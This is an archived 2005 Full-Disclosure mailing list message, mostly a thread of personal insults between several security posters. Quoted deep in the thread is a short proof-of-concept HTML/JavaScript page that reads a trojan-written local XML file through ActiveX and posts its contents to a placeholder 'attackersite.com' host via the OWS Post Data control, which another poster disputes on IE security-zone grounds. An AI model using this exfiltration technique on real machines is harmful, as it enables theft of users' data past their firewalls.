lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <d3a62f6f0512221006x6b2d2deck7e7b8c4c864e041e@mail.gmail.com>
Date: Thu Dec 22 18:06:58 2005
From: testdrive6 at gmail.com (Test Drive)
Subject: new attack technique? using
	JavaScript+XML+OWSPost Data

On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
>
> You surely must be a clone of Gaurav !! Ain't you ??
>
> name pipe [mailto:namepipe@...il.com] brazenly wrote:
> >> Before flaming others just look at urself.  wtf u do moron debasis ,
> sell nessus reports for 5K, without even removing false +ives ??
>
> lol !! Is that what you do ??
>

No u do that .. everone  knows abt it.

>> This is ur elite resume ->
> http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical
> Hacker ???? omfg.
>
> Certainly, like many others I was also one time looking for a good break
> and moreover I just wanted to have a web based copy on a security jobs
> site. I am glad that my resume made you laugh.
>

>> You trying to be next fadia or wat ?
>
> I never have to become like someone else.... I'm pretty much happy with my
> own identity.
>

>> Do you want me to post ur lame Firewall bypass vulnerabilities links
> which have been already founded  years before?
>
> Is that the one that one, which many securitysites released as an advisory
> including the vendor himself. Why you, infact I wud be glad to post it
> again.
> http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
>
> Also don't forget to refer those CVE, BID, FrSIRT, OSVDB, Secunia,
> Securiteam,  ISS X-Force, US-CERT reference link on my site. They might help
> you clarify your doubt.
>

Are u talking abt the WGA  check, which some1 posted abt 2 week ago.

>> Basically u are an asshole. So stfu.
>

*****STFU**** **

Is this statement phrased using both gaurav's and ur's l33t skils?? :P
>
> - D
>
>
>
>  ------------------------------
> *From:* name pipe [mailto:namepipe@...il.com]
> *Sent:* Thursday, December 22, 2005 10:54 PM
> *To:* Debasis Mohanty
> *Cc:* Gaurav Kumar; full-disclosure@...ts.grok.org.uk
> *Subject:* Re: [Full-disclosure] new attack technique? using
> JavaScript+XML+OWSPost Data
>
> Before flaming others just look at urself.  wtf u do moron debasis , sell
> nessus reports for 5K, without even removing false +ives ??
> This is ur elite resume ->
> http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical
> Hacker ???? omfg. You trying to be next fadia or wat ? Do you want me to
> post ur lame Firewall bypass vulnerabilities links which have been already
> founded  years before?
>
> Basically u are an asshole. So stfu.
>
> On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> >
> > Keep it up moron !!
> >
> > > oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years
> > > kidder than u)
> >
> > Shit !! Another several years ppl has to tolerate your stupidity till
> > you
> > actuall _grow up_.
> >
> > > Tell me one thing, a Windows XP + Offfice XP + Internet explorer
> > > combination so rare ?
> >
> > Is this a new topic ?? I mean are you done with your firewall and some
> > weired trojan design :P
> >
> >
> > - D
> >
> >
> > -----Original Message-----
> > From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of Gaurav
> > Kumar
> > Sent: Thursday, December 22, 2005 10:23 PM
> > To: Debasis Mohanty
> > Cc: full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] new attack technique? using
> > JavaScript+XML+OWSPost Data
> >
> > typo- i am 22 and YOU ARE 27, so i am 5 years kidder than u.
> >
> > On 12/22/05, Gaurav Kumar < gaurav@...urebox.org> wrote:
> > > oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years
> > > kidder than u)
> > >
> > > The _real_ thing is that I proved the point.
> > > U told win xp will give access denied error. I proved u wrong with the
> >
> > > proof attached.
> > > U told above technique wont work...i proved u wrong.
> > > Tell me one thing, a Windows XP + Offfice XP + Internet explorer
> > > combination so rare ?
> > >
> > > Is that all making ur ego shattered?
> > >
> > > ...and u are no one to decide what should one disuss on this list.
> > >
> > > regards,
> > > gaurav
> > >
> > >
> > >
> > > On 12/22/05, Debasis Mohanty < mail@...kingspirits.com> wrote:
> > > > Kid,
> > > > Although I normally don't reply to such frivilous and lame
> > > > statements but your reply has seriously piss me off.. So dropping
> > > > few lines, perhaps will help you grow up !!
> > > >
> > > > -----Original Message-----
> > > > >> From: Gaurav Kumar brazenly wrote:
> > > >
> > > > >> Looks like u need to read again what i wrote. I didnt use the
> > > > >> word
> > > > 'spread'.
> > > >
> > > > I don't have to !! I can still remember your priceless statements
> > > > [1] + [2]
> > > > -
> > > >
> > > > [1] A Trojan has been to be placed in a system running an
> > > > application [1] firewall like Zone Alarm Pro etc.
> > > >
> > > > [2] The target system must be having office XP and the user has to
> > > > be [2] lured to view a webpage hosted by attacker.
> > > >
> > > >
> > > > ROFL !! May be you could just ask your l33t victim to send you his
> > > > passwords and other info by email :P Don't forget to send him your
> > > > l33t email ID - '@ securebox.org'
> > > >
> > > >
> > > > >> [3] Moreover, u need not know if the target system is running ZA
> > > > >> or
> > > > not...
> > > > >> [3] "the technique works even if firewall is not installed".
> > > >
> > > > >> [4] I am discussing a possible 'design' of a trojan here, "doesnt
> > > > >> matter
> > > > is ZA
> > > > >> [4] or any other FW is running on client".
> > > >
> > > > Looking at statement [3] & [4], (especially the statement within
> > > > double
> > > > quotes) just made me believe that you don't know what your are
> > > > talking about unless you want to look like an idiot.
> > > >
> > > >
> > > > >> really? ever heard of IE exploits?
> > > >
> > > > Priceless !!
> > > >
> > > >
> > > > >> Well..Exactly! i would suggest u read the 'assumptions' first,
> > > > >> its an assumption that user will click yes to warning...like most
> > 'normal'
> > > > users do.
> > > >
> > > > Yet another priceless statement... Maybe you could just ask your
> > > > l33t victim to click 'yes' to your l33t piece of code trying to
> > > > download some l33t piece of shit which will fail to run and die like
> > an
> > idiot.
> > > >
> > > >
> > > > I am sure you have enough l33t skills to strick back to keep your
> > > > ego up2date however, I wud rather suggest if you have only your
> > > > stupidity to share then feel free to take it offline and don't piss
> > > > off everyone in this list. I would welcome you if you really want to
> > > > strike back with some _serious_ technical stuff. (Note: make a note
> > > > of _serious_ in the statement)
> > > >
> > > > - D
> > > >
> > > >
> > > >
> > > >
> > > > -----Original Message-----
> > > > From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of
> > > > Gaurav Kumar
> > > > Sent: Thursday, December 22, 2005 8:52 AM
> > > > To: Debasis Mohanty
> > > > Cc: full-disclosure@...ts.grok.org.uk; websecurity@...appsec.org
> > > > Subject: Re: [WEB SECURITY] RE: [Full-disclosure] new attack
> > technique?
> > > > using JavaScript+XML+OWSPost Data
> > > >
> > > > On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> > > > > -----Original Message-----
> > > > > From: Gaurav Kumar
> > > > > Sent: Wednesday, December 21, 2005 8:59 PM
> > > > > To: full-disclosure@...ts.grok.org.uk
> > > > > Cc: websecurity@...appsec.org
> > > > > Subject: [Full-disclosure] new attack technique? using
> > > > > JavaScript+XML+OWSPost Data
> > > > >
> > > > > 1>> A Trojan has been to be placed in a system running an
> > > > > 1>> application firewall like Zone Alarm Pro etc.
> > > > >
> > > > > >> Assumptions:
> > > > >
> > > > > 2>> The target system must be having office XP and the user has to
> >
> > > > > 2>> be lured to view a webpage hosted by attacker.
> > > > >
> > > > > 3>> The Trojan can be designed to generate an xml file which will
> > > > > 3>> contain the data to be sent out. The attacker will lure
> > > > > the
> > > > > 3>> user to visit a website hosted by him.
> > > > >
> > > > > Lol !! In a practical scenario, the attacker who spreads the
> > > > > worm/trojans himself is not aware in the initial stage which are
> > > > > the infected machines unless the trojan sends back the
> > > > > machine/user info back to the attacker. Now as you have already
> > > > > mentioned ZA is running then no data can be sent back to the
> > > > > attacker. So the attacker is clueless
> > > > which are those infected machines.
> > > >
> > > > Looks like u need to read again what i wrote. I didnt use the word
> > 'spread'.
> > > > Moreover, u need not know if the target system is running ZA or
> > > > not...the technique works even if firewall is not installed. I am
> > > > discussing a possible 'design' of a trojan here, doesnt matter is ZA
> > > > or any other FW is running on client.
> > > >
> > > > > So the case of luring the user to visit the link is out of
> > scope...
> > > >
> > > > really? ever heard of IE exploits?
> > > >
> > > > >
> > > > > >> The site can have following HTML code-
> > > > >
> > > > > Now coming back to technical stuff, You are trying to access a
> > > > > local file which will only be allowed if the site is in "Trusted
> > > > > Sites" or "Local Intranet" or "Local Security Zone" and activex
> > not
> > marked safe.
> > > > > The fact that *the client is also the server* is irrelevant.
> > > > >
> > > > > Try uploading the script to some webserver and give a html
> > > > > extention; it will throw an _access denied_ error when the page
> > > > > loads (even on Win XP + SP1).
> > > > >
> > > > > In case of any server side extention like *.asp, *.jsp etc, the
> > > > > user will be prompted that an malicious component is trying to
> > > > > load and ask for user permission.
> > > > >
> > > > >
> > > > > >> <html>
> > > > > >> <body>
> > > > > >> The author is not responsible for any misuse, this PoC is for
> > > > > >> educational purpose only.
> > > > > >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > > > > >> id="exp">
> > > > > >> </object>
> > > > > >> <script LANGUAGE=javascript>
> > > > > >> var xmlDoc
> > > > > >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > > > > >> xmlDoc.async=false ;
> > > > > >> xmlDoc.load("c:\\note.xml");
> > > > > >> xmlObj=xmlDoc.documentElement;
> > > > > >> var a= xmlObj.firstChild.text;
> > > > > >> exp.Post(0," http://www.attackersite.com/input.asp",a)<http://www.attackersite.com/input.asp%22,a%29>
> > ;
> > > > > >> </script>
> > > > > >> </body>
> > > > > >> </html>
> > > > >
> > > > >
> > > > > >> The above code (works well on windows XP SP2) essentials calls
> > > > > >> "OWS Post Data" COM control to post the contents of note.xml
> > > > > >> (generated by trojan) to attackersite.com
> > > > >
> > > > > IMHO, never conduct such tests in a "Intranet Zone" or "Local
> > Zone"
> > > > > and draw conclusion about "Internet Security Zone".
> > > > >
> > > > > You may also link to know about this issue -
> > > > > http://support.microsoft.com/kb/317244/EN-US/
> > > > >
> > > > >
> > > > > >>> Essentially, the technique is breaking the basic functionality
> > > > > >>> of application firewalls by using OWS Post Data as bridge for
> > > > > >>> sending out the data using Javascript and XML.
> > > > >
> > > > > Not Exactly !! I wud rather suggest you to do a little more
> > > > > research and draw any conclusion. Keep those _Security Zones_ in
> > > > > mind before you post anything...
> > > >
> > > > Well..Exactly! i would suggest u read the 'assumptions' first, its
> > > > an assumption that user will click yes to warning...like most
> > 'normal'
> > > > users do.
> > > > >
> > > > >
> > > > > - D
> > > >
> > > >
> > > >
> > >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051222/0075e00a/attachment-0001.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ